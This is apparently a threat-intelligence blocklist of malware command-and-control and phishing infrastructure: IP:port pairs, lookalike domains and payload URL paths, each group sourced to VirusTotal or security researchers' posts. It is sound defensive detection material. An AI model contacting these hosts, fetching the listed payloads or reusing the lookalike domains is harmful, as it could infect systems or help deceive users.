http://52.196.119.113
http://66.192.70.38
http://78.229.133.134
http://93.187.43.200
http://95.211.139.88
http://98.103.103.168
http://98.103.103.170
192.ho4x.com
ahyses.ddns.net
amazonsdeliveries.com
chgvaswks045.efgz.efg.corp
ciagov.gotdns.ch
dsecti0n.gotdns.ch
enterprizehost.com
host-101.ipsec.io
jdirving.email
kernel32.ddns.net
kooks.ddns.net
logexpert.eu
megalon.trustwave.com
metrowifi.no-ip.org
microsoft-invites.com
microsoft-update7.myvnc.com
mygoogle-analytics.com
pie32.mooo.com
polygon.1dn0.xyz
remote-01.web-access.us
rzepka.se
securetx.ddns.net
sixeight.av-update.com
sparta34.no-ip.biz
sukem.zapto.org
vanesa.ddns.net
wellsfargolegal.com

# Reference: https://twitter.com/TheDFIRReport/status/1423331717117579268
# Reference: https://beta.shodan.io/host/45.32.206.130

http://45.32.206.130
45.32.206.130:22
45.32.206.130:443

# Reference: https://twitter.com/TheDFIRReport/status/1423331717117579268
# Reference: https://beta.shodan.io/host/46.101.104.95

46.101.104.95:443
46.101.104.95:8000
46.101.104.95:8443
46.101.104.95:9100

# Reference: https://twitter.com/ScumBots/status/1423468949774217219
# Reference: https://www.virustotal.com/gui/file/5dc6dfbc8044deb6a3745a29fa4e285f62f91fe2a73ca247272bfd539b75f128/detection

192.100.0.17:4444

# Reference: https://twitter.com/ScumBots/status/1438826396491595777
# Reference: https://www.virustotal.com/gui/file/dbc4e318ce40d4ebfda9f59438f8c13a1ac6f89c5e6ecf6acfebe818c1641676

130.193.41.58:443

# Reference: https://twitter.com/ScumBots/status/1457362285861736453
# Reference: https://www.virustotal.com/gui/file/ea6cbb61f0589f139f4a79652e820329b02a5017e2a3703e8e35e33c012c13f4/detection

18.194.132.191:443

# Reference: https://twitter.com/ScumBots/status/1462040606872592395
# Reference: https://www.virustotal.com/gui/file/c92a7f657301e496610ae9ff85e01fe8e60f1179cae6e062bfcfd191a4c0e30d

23.88.123.250:4444

# Reference: https://www.virustotal.com/gui/file/27a220a96badc097884262c8a9358aa84e41b322556e08d30b1eb9bd1b78f167/detection

185.146.232.30:1337

# Reference: https://twitter.com/TheDFIRReport/status/1467860126077911043

138.197.167.41:443

# Reference: https://www.virustotal.com/gui/file/2e92e5f45d575d43a0a1d21654e0691b6ea7b45da9761482095005b6611d8419/detection

115.186.187.80:1234

# Reference: https://www.virustotal.com/gui/file/a6ef8216979b8b7f8f033bbcba91b4cba9a8cead9c4553e0855cd51956f61efd/detection
# Reference: https://www.virustotal.com/gui/file/ed77c28f2115e221d32e032db915ddd4247b665aa28e9f391f96b1730a41a861/detection

45.146.164.160:4321

# Reference: https://www.virustotal.com/gui/file/4c2574de9f72209ee2e1e7fe23830746850170869af411bef2111c4097d5f8da/detection

24.135.12.28:8080

# Reference: https://www.virustotal.com/gui/file/9a1c09403bd04ba1af32df5ba156671814193bd9518129dfa14f707eae785378/detection

51.178.75.43:41200

# Reference: https://www.virustotal.com/gui/ip-address/185.112.146.165/relations
# Reference: https://www.virustotal.com/gui/file/c8f710f0a9c18d38a7ecf4ca6a9d28219c32037a643a1d45989831c0ec975048/detection
# Reference: https://www.virustotal.com/gui/file/c9d281b901ce339495a0c2984e79ceaaa8a769c79bd27d211026cba030e9f794/detection
# Reference: https://www.virustotal.com/gui/file/d2cdc57f4bde1e89d65db8201f240e626022e08df5be3f8fa585848c1119530a/detection
# Reference: https://www.virustotal.com/gui/file/21c14dfb477a1c4e005c56d1676aa5a90f9e08e1b0c07c486fb55f21e75e2621/detection
# Reference: https://www.virustotal.com/gui/file/b544e5581dbdca825eb07a15fa3bc7c208577e8489b620f479f96a792241efb3/detection
# Reference: https://www.virustotal.com/gui/file/4fdec157e4343619c671e3d722bf75baafe24a65cc60a45603eb720f1a503999/detection
# Reference: https://www.virustotal.com/gui/file/e93ea9ebfb97c8fdfe00ce405a14d661581c494c648827cdea6ba89089284df4/detection

185.112.146.165:4446
185.112.146.165:45000
185.112.146.165:8080
185.112.146.165:8081
54.38.220.85:123
badmildiou.com
nidhoggr.club
treefighter.org

# Reference: https://threatfox.abuse.ch/browse/tag/log4j/

185.254.196.122:4445

# Reference: https://twitter.com/ankit_anubhav/status/1471079526658560003
# Reference: https://tria.ge/211215-njvt8sadaq/behavioral1

62.182.158.156:6666
62.182.158.156:8888

# Reference: https://www.virustotal.com/gui/file/20ad997410c4e5ac78ad3ecaf76bf3595aacda71e899a0bd2ef90917afd69ff0/detection

13.58.157.220:17525
3.142.129.56:17525
3.142.167.4:17525
3.142.167.54:17525
3.142.81.166:17525
3.19.130.43:17525

# Reference: https://www.virustotal.com/gui/file/0156ca6f8fb12a2415de4c896f346caab9f342ccd597912b88e890805fcd1e3d/detection

3.129.187.220:14020
3.131.147.49:14020
3.133.207.110:14020
3.136.65.236:14020
3.138.180.119:14020
3.22.15.135:14020

# Reference: https://twitter.com/petrovic082/status/1467822724932321288
# Reference: https://app.any.run/tasks/d367b18c-69e6-4026-b84a-4f8d52098687/
# Reference: https://www.virustotal.com/gui/file/bb627db44f44c8b23220602f5ae6bc2fa34b89d612ab3118f815fca43cfcf331/detection

v3-fastupload.s3-accelerate.amazonaws.com

# Reference: https://twitter.com/r3dbU7z/status/1468119168096612357
# Reference: https://www.virustotal.com/gui/file/fafbf0870568dae2e02913cbe158011c867098bda883c8f85a13d1f83a4aa937/detection

208.88.226.158:443

# Reference: https://twitter.com/drb_ra/status/1476180260953726978

emailservices.events

# Reference: https://twitter.com/drb_ra/status/1476758694729764890

188.166.171.154:443

# Reference: https://twitter.com/TheDFIRReport/status/1461733507324162056

13.90.131.107:443

# Reference: https://www.virustotal.com/gui/file/4a61696932f036bd2f57482516fd5d8b7e2939259757f82d17ed27f6fe430794/detection

3.14.182.203:12417

# Reference: https://www.virustotal.com/gui/file/2d1f1b961df03d0f572f072aae89e6c2f9e947d87551df85781d781cbf5a3918/detection

45.142.212.161:8881

# Reference: https://www.virustotal.com/gui/file/bd7745a252f92a9a8ef0e0469d113c354dde8547e1cbc9a865080cfa48eda9c8/detection

boyte.sytes.net

# Reference: https://twitter.com/ffforward/status/1479416818829860866

/katalogpwsh/

# Reference: https://www.virustotal.com/gui/file/64dcd0626a335c212083a51ffffc37950fcd5dfea73b8e6a5d8c92d6abfd8e71/detection

119.45.102.166:4445

# Reference: https://www.virustotal.com/gui/file/bc3beb2ce29d965c215baf97c54cb321d7f579a7a6fe6a4992e4f1f5d8d51808/detection

194.5.98.253:5900
joelthomas.linkpc.net

# Reference: https://www.virustotal.com/gui/file/27db881cc60237f6c967fd8475115a64dec4b9246908e2a940382dad66bb31d7/detection

167.172.61.60:443

# Reference: https://www.virustotal.com/gui/file/e67a7ce47865a9324cf1419c71204a15fb24dc875a0a51451bf71d29d7c41fd3/detection

167.172.61.60:444

# Reference: https://twitter.com/JAMESWT_MHT/status/1488152643230965760
# Reference: https://www.virustotal.com/gui/file/9786fa48e5307616b67727ae75b1b08393b71ad9c088c6277a598638d1bb5a15/detection

imagingworld.in/factur.docx
imagingworld.in/report.pdf
pinkstravels.com/locals.php

# Reference: https://www.virustotal.com/gui/file/512cd7d8f32c1da7b949871b47cee24c454e58585b6ea151c66789fd4a065c78/detection

yugnuvurka.temp.swtest.ru

# Reference: https://www.virustotal.com/gui/file/29e7cf9579480cc3787c3e33add6e99611611c448eea2c7cf67e789d64d397ff/detection

zospayilmu.temp.swtest.ru

# Reference: https://www.virustotal.com/gui/file/034927ea9d5aa9bb0a88a364af4d9733f5b9b933aa7ecd45b6aa9e1cc221c6ca/detection

http://5.181.80.213

# Reference: https://twitter.com/malwrhunterteam/status/1489520707809779715
# Reference: https://www.virustotal.com/gui/file/d7ba3b1d6fe9230a53606857508d0e79682e71fbd9200e70360700d831d8fef3/detection

coolfreecv.com:443/doc/coolfreecv_resume_en_06_n.docx

# Reference: https://www.virustotal.com/gui/file/1038e0df36ff80507942b6ac24f5bfda0d23416a5385c8c645ff0a8cf4f66acf/detection

http://198.50.177.251

# Reference: https://twitter.com/ScumBots/status/1492247150251720707
# Reference: https://www.virustotal.com/gui/file/f51e500a628692adcc6aec55c3277675c8bbcb842fabfb61dab7408e2dd2968d/detection

18.188.14.65:18033
18.216.53.253:18033
18.223.41.243:18033
18.224.144.66:18033
198.58.98.92:18033
3.13.191.225:18033
3.134.125.175:18033
3.134.196.116:18033
3.134.39.220:18033
3.135.90.78:18033
3.137.63.131:18033
3.14.182.203:18033
3.14.212.173:18033
3.17.117.250:18033
3.17.202.129:18033
3.17.7.232:18033
3.19.114.185:18033
3.19.3.150:18033
3.20.98.123:18033
3.22.30.40:18033
45.79.7.70:18033
45.79.9.205:18033
52.14.61.47:18033
52.15.183.149:18033
52.15.194.28:18033
52.15.62.13:18033
52.15.72.79:18033

# Reference: https://www.virustotal.com/gui/file/3dfe6b6f02b05498e07f164ca29545631cbc909a1c1000a4e40113407cde1d03/detection

http://45.64.112.51

# Reference: https://twitter.com/jaydinbas/status/1493202636866261000
# Reference: https://www.virustotal.com/gui/file/4db544c4ff262ba2f01b23cf9d6c3af23cae203efb7e06d7960ad06ada564f2b/detection
# Reference: https://www.virustotal.com/gui/file/944a8fac13b495f11628696c04673115c90ee650fc8ff3e440335e6d73df2496/detection
# Reference: https://www.virustotal.com/gui/file/de62e54976010eebd7a764e7ad5029a23b26256308f713229f724abb4f4be05c/detection

inexa-group.com
paste.inexa-group.com

# Reference: https://twitter.com/jaydinbas/status/1489241835927216128
# Reference: https://www.virustotal.com/gui/file/c23e61db0e74e6d48ba27f17461abc88c700e0a386ffdbd4c1a1571ebf630d4f/detection

i-development.one

# Reference: https://www.virustotal.com/gui/file/922f078a109aa494d631a81d67e6b9db994af58db023fa9c69576c96e2616ae3/detection

hdoc.duckdns.org

# Reference: https://twitter.com/1ZRR4H/status/1496748012256866308

101.35.121.232:8000

# Reference: https://www.virustotal.com/gui/file/a0e90b286000cff6bc9236c1d49763b19b554b8cd5cd7549907c8de88e372240/detection
# Reference: https://www.virustotal.com/gui/file/985f7026e7e8482e4c7e0fd87390b99aa9d00888774189cbf6828fb4553dbb80/detection

42.193.39.49:8080

# Reference: https://twitter.com/Max_Mal_/status/1500447223217278980
# Reference: https://www.virustotal.com/gui/file/fb7970ac7563dedda8cf507d7dabcfbe15f32bd91c4499420a50cd318d5ec439/detection

http://103.142.218.18

# Reference: https://www.virustotal.com/gui/file/f5a4a5e62200a8409389072b0b9e3af7760b9d83f479cdc25b100319bbe2b2e8/detection

http://157.245.250.76

# Reference: https://twitter.com/ScumBots/status/1501868046822031361
# Reference: https://www.virustotal.com/gui/file/c24bbc9e4f16081e64d94b6104890b37b4492e14ea62cfc7844f511ede25e081/detection

149.28.148.219:8445

# Reference: https://twitter.com/ScumBots/status/1502341161393999872
# Reference: https://www.virustotal.com/gui/file/0012303bbcfa1d83fc655c54c28ffe2cd041504f1ab8ae704dc0614f2b2a07ba/detection

85.214.237.196:443

# Reference: https://www.virustotal.com/gui/file/449888a9bd8efbfe0f9c15965882d3ea50fec4a124bc7fd603ac16956289a16c/detection

154.16.167.72:1006

# Reference: https://www.virustotal.com/gui/file/938300c70c7ee66a45b6e747f068a1d08e6191a6fbd17d73d6ea2ee673da9f0f/detection

124.222.220.31:4444

# Reference: https://twitter.com/drb_ra/status/1504978479309332480

18.135.28.6:443

# Reference: https://twitter.com/drb_ra/status/1507194659285745665

tunnistautuminen.quest

# Reference: https://twitter.com/drb_ra/status/1507152832264298496

red-ops.team
/qqzddddd/2018/load.php

# Reference: https://twitter.com/drb_ra/status/1507877703017508868

18.116.32.198:443

# Reference: https://twitter.com/drb_ra/status/1507917437899055106

149.167.94.36:443

# Reference: https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/
# Reference: https://www.virustotal.com/gui/file/77e0d3366f7516cb2661a48c252fee7a1bc0abfe598feae40cf4e1c918fe97ee/detection
# Reference: https://www.virustotal.com/gui/file/9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0/detection
# Reference: https://www.virustotal.com/gui/file/c7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28/detection

swordoke.com

# Reference: https://twitter.com/drb_ra/status/1509195039095803918

193.36.15.251:443

# Reference: https://www.virustotal.com/gui/file/51973e690c8790f7270b2e1e99383a81bac1f01bc5f46dab9341834513721ef6/detection

3.141.142.211:12356

# Reference: https://twitter.com/drb_ra/status/1510064550632169479

androidenews.com

# Reference: https://twitter.com/drb_ra/status/1510609246534180873

http://142.93.233.148

# Reference: https://www.virustotal.com/gui/file/2b15cb9ae88ee3aa9a9fe8a27479a570062c8c31e0b28f264f0223412221fb93/detection

95.216.221.82:4444

# Reference: https://twitter.com/drb_ra/status/1511371495271976965

nettitude.gzpt.org

# Reference: https://twitter.com/drb_ra/status/1511501477793222665

daq09367inkax.cloudfront.net

# Reference: https://twitter.com/ScumBots/status/1512096689422839815
# Reference: https://www.virustotal.com/gui/file/472e4f80a21736d734de6735d6686d4526d76ff68c3ffc5880d0e44580b1b0ba/detection

46.4.114.111:9999

# Reference: https://twitter.com/drb_ra/status/1512998349426896897

143.198.71.104:443

# Reference: https://twitter.com/drb_ra/status/1512999086638735365

appsteams.com

# Reference: https://twitter.com/drb_ra/status/1513690881408348166

office.thebrain.net

# Reference: https://twitter.com/drb_ra/status/1514041527814823947

45.56.113.131:443

# Reference: https://twitter.com/drb_ra/status/1514449947650924546

ye-cert.com

# Reference: https://www.virustotal.com/gui/file/0008e122dff45c48ab93361085280cca8c0f8f0f35f742ea73a772f03dde1f41/detection

seryanjek.com

# Reference: https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/
# Reference: https://otx.alienvault.com/pulse/6135d2c0c031eac2759657d6

135.181.10.218:443

# Reference: https://twitter.com/drb_ra/status/1516937383090044930

34.235.5.141:443

# Reference: https://twitter.com/drb_ra/status/1516940210776547328

54.37.225.27:443

# Reference: https://twitter.com/drb_ra/status/1516940512422506496

classcharts.uk

# Reference: https://twitter.com/drb_ra/status/1518577537651200000

109.228.40.199:443

# Reference: https://twitter.com/osipov_ar/status/1518654392777510916

http://138.124.184.220

# Reference: https://twitter.com/drb_ra/status/1519839795471659008

52.185.188.46:443

# Reference: https://twitter.com/drb_ra/status/1520199027547062274

18.208.248.51:443

# Reference: https://twitter.com/drb_ra/status/1520226667624648706

pankki.store

# Reference: https://twitter.com/ScumBots/status/1520700888112930817
# Reference: https://www.virustotal.com/gui/file/5b386d361997ea2108141a8c22ae8f6bb3835a8e23ef25dd72b9438674dc595c/detection

106.10.106.0:4444

# Reference: https://twitter.com/ScumBots/status/1521869837185781762
# Reference: https://www.virustotal.com/gui/file/5e0ff6e0762fefc8f7a7d214b9717c64abb8000283014965b74225fed08eeb89/detection

206.189.119.181:443

# Reference: https://twitter.com/drb_ra/status/1522757920068411399

147.182.134.175:443
174.138.110.120:443

# Reference: https://twitter.com/drb_ra/status/1522920341500219394

52.246.168.227:443

# Reference: https://twitter.com/drb_ra/status/1525299882256375808

159.65.136.204:5050

# Reference: https://twitter.com/drb_ra/status/1524547711781027841

23.163.0.59:443

# Reference: https://twitter.com/drb_ra/status/1524910249731293207

34.238.250.112:443

# Reference: https://twitter.com/drb_ra/status/1525482106171887623

159.203.28.9:443

# Reference: https://twitter.com/drb_ra/status/1525488694215458823

195.123.220.222:443

# Reference: https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/

collaboration-bw.de
kleinm.de

# Reference: https://twitter.com/ScumBots/status/1526215976748036102
# Reference: https://www.virustotal.com/gui/file/cb3ddfba160b1a928fc99c80e8b3f82ed620998d082793022461aef6ba2f3e0c/detection

3.126.224.214:16050

# Reference: https://twitter.com/drb_ra/status/1526926521583259649

150.136.140.174:443

# Reference: https://twitter.com/drb_ra/status/1527094517156962304

95.213.145.101:443

# Reference: https://twitter.com/drb_ra/status/1528185222709362689

docs.jcbbrokers.com

# Reference: https://twitter.com/drb_ra/status/1528375525798035458

206.189.4.169:443

# Reference: https://www.virustotal.com/gui/file/0022045c76a9880ed0dbef3db814c92529c9e5fdbc5e1b1dc0fdcc26140fb45a/detection

digitalcomparendo.com.co

# Reference: https://www.virustotal.com/gui/file/a6bca64361aaaf870b90525ffc35e2b17d2ba17b94a7bde793f0aafa02f11c54/detection

sellinruss2.com

# Reference: https://www.virustotal.com/gui/file/50538c1210a31fe8608676a6c7b061bc4b8472db053de6fa80daae7d86372e28/detection

http://54.159.59.99

# Reference: https://twitter.com/drb_ra/status/1529991314326147086

159.223.194.182:443

# Reference: https://www.virustotal.com/gui/file/cdfc5ba406b1099a15ec57cd52c916238a8a89a3e6505f47a692cba92739f455/detection

king-ccards.online

# Reference: https://twitter.com/malwrhunterteam/status/1531709311746985984
# Reference: https://www.virustotal.com/gui/file/e8f0a2f79a91587f1d961d6668792e74985624d652c7b47cc87367cb1b451adf/detection
# Reference: https://www.virustotal.com/gui/file/bf10a54348c2d448afa5d0ba5add70aaccd99506dfcf9d6cf185c0b77c14ace5/detection
# Reference: https://www.virustotal.com/gui/file/1f245b9d3247d686937f26f7c0ae36d3c853bda97abd8b95dc0dfd4568ee470b/detection

109.248.59.74:1337

# Reference: https://twitter.com/ScumBots/status/1531994048269000706
# Reference: https://www.virustotal.com/gui/file/254d9104946b1fa73c5447dcf57c6a8172401feec7d9c518eba23df90b57ca4f/detection

54.190.24.216:8080

# Reference: https://twitter.com/ScumBots/status/1532355178447388673
# Reference: https://www.virustotal.com/gui/file/6f761d9149c1ab9e1a19c77821419e3b11b60d8649ed4406c269c2b96690d0c0/detection

3.22.53.161:10221

# Reference: https://twitter.com/malwrhunterteam/status/1532443932453388288
# Reference: https://www.virustotal.com/gui/file/8d7117bc2c97e7e1a2c6417c37edc1031fb9441cbedc40ed38276d441d018d9b/detection

8866ddd7771251526d5e5e.cloudflareworkers.com

# Reference: https://twitter.com/ScumBots/status/1532933990927286272
# Reference: https://www.virustotal.com/gui/file/dd5d4da062f7b6363d3f165e76392b84ff455def8eeca2980b92f9295c364171/detection

3.6.115.182:16512

# Reference: https://www.virustotal.com/gui/file/3eb41d7351608e5ec7ae17da7bd889a6edadb3fd26080546d5093bd7fbd108bd/detection

adfj4356sjkl23jf367ld234k6fh6k86s234.jquerydb.com
resource.jquerydb.com

# Reference: https://twitter.com/drb_ra/status/1532701358586994688

13.59.166.155:443

# Reference: https://twitter.com/drb_ra/status/1532710008470884355

109.234.36.5:443

# Reference: https://twitter.com/drb_ra/status/1532882609541455873

bcxstaging.co.za
dev.bcxstaging.co.za

# Reference: https://twitter.com/drb_ra/status/1532882928316858370

daq09367inkax.cloudfront.net

# Reference: https://www.virustotal.com/gui/file/b536ba7328c4913798d2146ddceec2bf7891abef728f2c57db71b153f59a5ef3/detection

http://101.43.242.147

# Reference: https://twitter.com/drb_ra/status/1533973002232246272

54.215.206.234:443
imadeyou.click
c2.imadeyou.click

# Reference: https://twitter.com/drb_ra/status/1533983732381646848

150.136.140.174:443

# Reference: https://www.virustotal.com/gui/file/b9b479158d5dea67310c4c0c732e852de11830f3416d5eb2faf01b777fdac20f/detection

dianli.ru

# Reference: https://twitter.com/drb_ra/status/1535428913190555649

109.234.36.5:443

# Reference: https://unit42.paloaltonetworks.com/cve-2022-26134-atlassian-code-execution-vulnerability/
# Reference: https://otx.alienvault.com/pulse/62a08073756f4059e6464d77

http://167.99.57.116
http://172.104.31.117
http://18.216.140.250
http://18.221.234.103
http://191.37.248.120
http://192.99.152.200
http://193.106.191.71
http://2.56.11.65
http://27.1.1.34
http://31.13.191.157
http://54.88.149.100
http://84.17.48.94
http://87.249.135.167
http://89.187.170.129

# Reference: https://twitter.com/pmelson/status/1536819641846272008
# Reference: https://www.virustotal.com/gui/file/1b9c291c4dca0f4af299a0ece26a7c3b3f87a0a7eb9f5b57aa7c894774c40407/detection

104.16.243.78:8080
104.16.244.78:8080
162.255.119.65:8080
n00bzunit3d.xyz
challs.n00bzunit3d.xyz
ctf.n00bzunit3d.xyz
test.n00bzunit3d.xyz
wiki.n00bzunit3d.xyz

# Reference: https://twitter.com/malwrhunterteam/status/1537022403347460096
# Reference: https://www.virustotal.com/gui/file/a8ce2181ce6e56c147412c600a430fdb7baf68550b6f822b98a1759f52adb72f/detection

gmgeneraltrading.com

# Reference: https://twitter.com/malwrhunterteam/status/1537412988558245888
# Reference: https://www.virustotal.com/gui/file/de495346ac81d29707c92181382989cbcc9ecab3feeb7c38eb6fe4364c89cde8/detection

transacor.ma

# Reference: https://twitter.com/malwrhunterteam/status/1537424206434119680
# Reference: https://www.virustotal.com/gui/file/68462163987c2f96488ff08d44d88b6f08d5da7ecbb478bd38d4a156bb61e2b7/detection

facturamx.club

# Reference: https://twitter.com/Dkavalanche/status/1537483210409803777

http://20.240.40.118

# Reference: https://twitter.com/malwrhunterteam/status/1537521767262015488

smarthav.com

# Reference: https://twitter.com/malwrhunterteam/status/1538094207478517764
# Reference: https://www.virustotal.com/gui/file/ddbd0b917d017d5709bd4fb2e0acd4d877d829fb9bc32865550fb556eadb6739/detection

pidipurev.com

# Reference: https://www.virustotal.com/gui/file/03269a24a60591752df46b0303e61c51798333dafd9ed59513bfa620866c2358/detection

gr3.ddns.net

# Reference: https://twitter.com/drb_ra/status/1537231657119338498

20.78.19.235:443

# Reference: https://twitter.com/malwrhunterteam/status/1539333876895854592
# Reference: https://www.virustotal.com/gui/file/2c861d284d35b5d9bd79c697430c32a41759ff713269ca54aabd165505d4ede4/detection
# Reference: https://www.virustotal.com/gui/file/b38109e065c8fe5fdaf88f182597b6bff73c6578f02a757afdba7031db054913/detection
# Reference: https://www.virustotal.com/gui/file/fd3cfce2a371634763db5d184ee7b8115e48baa16177d27376a61c75092e1a32/detection
# Reference: https://www.virustotal.com/gui/file/a2514e2e9c9eb522c07ddad50c66a0c99d9ac64a7445722f94bd5fb358e45220/detection
# Reference: https://www.virustotal.com/gui/file/6e2be3ffea3e74f39145d89bd69a91162c4a436a51da3c1e1b9131c8f8764861/detection

206.84.168.139:4444
206.84.168.191:4444
206.84.168.30:4444
206.84.169.110:4444
strongvpn.ga

# Reference: https://twitter.com/drb_ra/status/1539425978438516737

192.18.141.199:443

# Reference: https://twitter.com/malwrhunterteam/status/1539621033908621314
# Reference: https://www.virustotal.com/gui/file/5270cb73da9b7ca550e1ae3ccd2e0875c7a5e49782daf2ca169d6a29d479f628/detection

http://95.217.244.204
infinite-stars.net

# Reference: https://www.virustotal.com/gui/file/c557d03fa307f13a3086053c022a8e146b1e5725995e2bf0fd2ef2d66d0ba9ea/detection

nikitarovonovich.pserver.ru

# Reference: https://twitter.com/malwrhunterteam/status/1540614846600908800

http://46.21.153.250

# Reference: https://twitter.com/ScumBots/status/1540390624788185089
# Reference: https://www.virustotal.com/gui/file/a3465a008ffa2a0946e1ebe4124f6569623940d0494a264c6329c818fdecb279/detection

3.142.129.56:1869

# Reference: https://twitter.com/ScumBots/status/1541462190745686016
# Reference: https://www.virustotal.com/gui/file/3e79efb3d76cd8ff9734ddab1e0cc2a08cf1903a6e1b6382acb7ea86a5d19660/detection

79.110.52.135:8080

# Reference: https://twitter.com/ScumBots/status/1542158527388680194
# Reference: https://www.virustotal.com/gui/file/9c4b568c60f30008f19e76a1cc16f37dbf2826c22a580f39b4f009a40f7530e7/detection

170.187.232.147:87

# Reference: https://twitter.com/malwareforme/status/1542261607035588608
# Reference: https://www.virustotal.com/gui/file/98d94759958e3b79de90e9da6a2a5d904cd3efc7c0f45773d2ac5dc4b63f1d56/detection

http://176.100.42.180

# Reference: https://www.virustotal.com/gui/file/21286ed0b3e56f49c287617ee5bf4ef687c627e342d72297008e3fce73a5ae20/detection

http://120.48.85.228

# Reference: https://twitter.com/drb_ra/status/1542850540421488640

45.14.224.96:443

# Reference: https://twitter.com/malwrhunterteam/status/1544045677482762241
# Reference: https://www.virustotal.com/gui/file/902d69ecac8da439d9e80b08b034c3bc94dca3b150bf2564752169682954ad43/detection

0c020.com

# Reference: https://twitter.com/drb_ra/status/1544122690818162689

83.229.83.41:443

# Reference: https://twitter.com/malwrhunterteam/status/1544688445154594819
# Reference: https://www.virustotal.com/gui/file/b9d958bdc2ce406d4fae5e73d19e9b3f5222a61e3fe3655ed36bb6ab83e145e7/detection

gojourneys.com/service.hta

# Reference: https://twitter.com/ScumBots/status/1545123058616307713
# Reference: https://www.virustotal.com/gui/file/924276827de0e5d6a1ffc01cb025f206159e974b71796c7b850794258daa1878/detection

payrewardapp.com
api.payrewardapp.com
imv.payrewardapp.com

# Reference: https://www.virustotal.com/gui/file/6da3fbd52970e23b106401bb82298e353f9d1db09fab7a6ad16b6a2ad0188060/detection

161.35.90.195:4444
c2server.duckdns.org

# Reference: https://twitter.com/malwrhunterteam/status/1547580496460206080
# Reference: https://twitter.com/StopMalvertisin/status/1547851359948804096

http://185.228.83.60
/alksdldoosal
/wxbTRXIuGyNqdPhzfYlJeDOUWKFC

# Reference: https://www.virustotal.com/gui/file/afa2a4fbfb46e5c2f687a741e7b8337c14a52c7bfcbe28cc27933a41dcdb8a6a/detection

Nerviusss25-51690.portmap.host

# Reference: https://twitter.com/drb_ra/status/1548662939716034562

a-banking.com
fly.a-banking.com

# Reference: https://www.virustotal.com/gui/file/c36f0d9d77e5fb8fbe251b57a6a02f7da6222bf270960a79c00422a56c8ca859/detection

45.32.160.133:9191

# Reference: https://www.virustotal.com/gui/file/f18667d39c13df2cc1cd68af0246667e9d7e614ba572120befe16e38f306b035/detection

212.192.242.16:1000

# Reference: https://www.virustotal.com/gui/file/4b445a21fa7863a844b90beebfb5bed18e2acea8f5747b32453fc31d9112963f/detection

downloadyarbot.shopyfi.ir

# Reference: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html

46.229.215.108:4433
78.40.219.13:8888

# Reference: https://www.virustotal.com/gui/file/eca5efb923224e2d8fddfcba53d30b44c8c68fc6cb73bca72dc4ec424096a7ef/detection

95.111.250.149:8000

# Reference: https://www.virustotal.com/gui/file/8948fb84fbefb2c969888ab77d438cb8ac00694551dbac317b236fda66e4a739/detection

20.226.41.232:9001

# Reference: https://www.virustotal.com/gui/file/30ce8e40b79621b0555bb818b71d769d3edf6210944007c17d1f31e918fadc45/detection

106.52.42.139:6789
106.52.42.139:801

# Reference: https://twitter.com/drb_ra/status/1550280325506469890

http://45.14.224.110
/vfe01s/1/vsopts.js/

# Reference: https://www.virustotal.com/gui/file/0da30282299c1f351510bfd83463d4ba820687c027e854b1b03fd6124547d77f/detection

213.170.135.6:25561
insmp.net
uk.insmp.net

# Reference: https://www.virustotal.com/gui/file/68a4fd2b4fe913f6ec71196731f0fa3bbed17589ee18d6ec2878a8a20001f905/detection
# Reference: https://www.virustotal.com/gui/file/4d72c7d6ded3cae715ce6f362d3ec79de5f484a264bf52532df316a496ecad04/detection
# Reference: https://www.virustotal.com/gui/file/3694875ffe41f247ef6b5d6eb2d5d3f9ee4939e94735f4aec96e1fa7e3e64d78/detection

aasporo.com

# Reference: https://www.virustotal.com/gui/file/56b823c64968f9eb87a57b688e569eb7040501f291be4606cb226ff281eaffb4/detection
# Reference: https://www.virustotal.com/gui/file/68a2c4cce8c8e8cdf819d8b4f8ab88c0c851fb4ca0dcc07d562a6befc4172380/detection

95.213.145.101:443

# Reference: https://www.virustotal.com/gui/file/04eabcc001b383709ce35e3b116812382dbe1ee77ad8bd2f0da7d39d14ce3b6d/detection
# Reference: https://www.virustotal.com/gui/file/20cf0e39859e911a23db28f8890ad018ff55a3ec6e2b3b849151ce21b08f47de/detection

209.141.58.154:6363
cvc.7766.org

# Reference: https://www.virustotal.com/gui/file/1373d61f65df4004490791ade8a04490db396c2e7a248f680896c524e0f5ffd5/detection

18.158.249.75:12778

# Reference: https://www.virustotal.com/gui/file/2c91462fb50fb7d0a394317401f9044db58e652435cd3beb05ae6e0a0184d63a/detection

http://66.70.238.65

# Reference: https://twitter.com/drb_ra/status/1552819839382835202

167.71.88.90:443
/utag/lbg/main/prod/utag.15.js

# Reference: https://twitter.com/drb_ra/status/1553373644386189312

192.9.244.42:443
/trader-update/history&pd=/

# Reference: https://www.virustotal.com/gui/file/0411b1c23bfb671d36136760706cf85a11af5cfd16f8de47a330a8ca915f1eef/detection

64.52.80.168:7778

# Reference: https://twitter.com/StopMalvertisin/status/1554677296472399872

78.85.17.88:8443

# Reference: https://twitter.com/StopMalvertisin/status/1554738107001765888

78.85.17.88:9991

# Reference: https://www.virustotal.com/gui/file/9c69b39140e43602c4040ab7e9fadf3d74fdc4f9f92cddd2586e6a24fe8c70e4/detection

sky-titans.net

# Reference: https://www.virustotal.com/gui/file/f506dc1b194dfd25df0dfc2490e53138400e0fd5147e79878e878168b57d8531/detection

http://185.156.43.249
185.156.43.249:5544

# Reference: https://www.virustotal.com/gui/file/e451243cc7e2ff3b82a99501ae6e0d3461d7c30e3ff23d71a70b9e5afe6400cf/detection

185.156.43.249:443

# Reference: https://www.virustotal.com/gui/file/ab19c9ee6c97509b12adae6bc4c3e2f3aeb295d6bb6dc39bfc4caab9d5c02c8e/detection

185.156.43.249:8088

# Reference: https://www.virustotal.com/gui/file/463e0ad8bd88738a3ad56095fd6c1df32db01b9194fe0c240e484c4ec877814e/detection

185.156.43.249:4433

# Reference: https://www.virustotal.com/gui/file/5887040b238982d1ec370dec2dfc2f20a3b358e1f03aa30e1c82f9ed46d0ef9a/detection
# Reference: https://www.virustotal.com/gui/file/7ddc9bbf5a0cb96e1a3eabd57c7a3c9529c99d47828c52782cc41f9479110894/detection

hjit.ru

# Reference: https://twitter.com/StopMalvertisin/status/1555461886711590913
